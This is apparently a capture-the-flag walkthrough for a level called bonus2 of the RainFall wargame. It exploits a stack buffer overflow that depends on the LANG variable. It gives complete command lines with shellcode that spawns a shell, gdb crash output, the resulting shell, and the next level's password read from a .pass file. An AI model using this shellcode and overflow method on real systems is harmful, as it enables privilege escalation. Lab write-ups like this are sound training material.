1.8 KiB
1.8 KiB
Using ghidra we notice LANG env variable is exploited and can be either fi, nl, or something else, defaulting to english. It calls a greeting function and uses both arguments. We'll set it to nl for now.
Fiddling a bit we can make the program segfault, and can make it segfault at any address
Starting program: /home/user/bonus2/bonus2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAA aaaaaaaaaaaaaaaaaaaaaaaXXXX
Goedemiddag! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaaaaaaaaaaaaaaaaaaaaaXXXX
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb)
let's try to put a shellcode after the x.
We find the argv in the stack at address 0xbffff8c0.
our 'X's are at address 0xbffff919. let's put our shellcode at 0xbffff920. That's 3 characters between the addresses and the shellcode.
it makes a strange behavior but doesn't work.
bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('A'*40)"` `python -c "print('a'*23+'\x20\xf9\xff\xbf'+'a'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"`
bonus2@RainFall:~$
let's try putting the shellcode in the first argument
bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('\x90'*100+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"` `python -c "print('a'*23+'\xe0\xf8\xff\xbf')"`
Goedemiddag! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>aaaaaaaaaaaaaaaaaaaaaaa<61><61><EFBFBD><EFBFBD>
$ whoami
bonus3
$ cat /home/user/bonus3/.pass
71d449df0f960b36e0055eb58c14d0f5d0ddc0b35328d657f91cf0df15910587
:)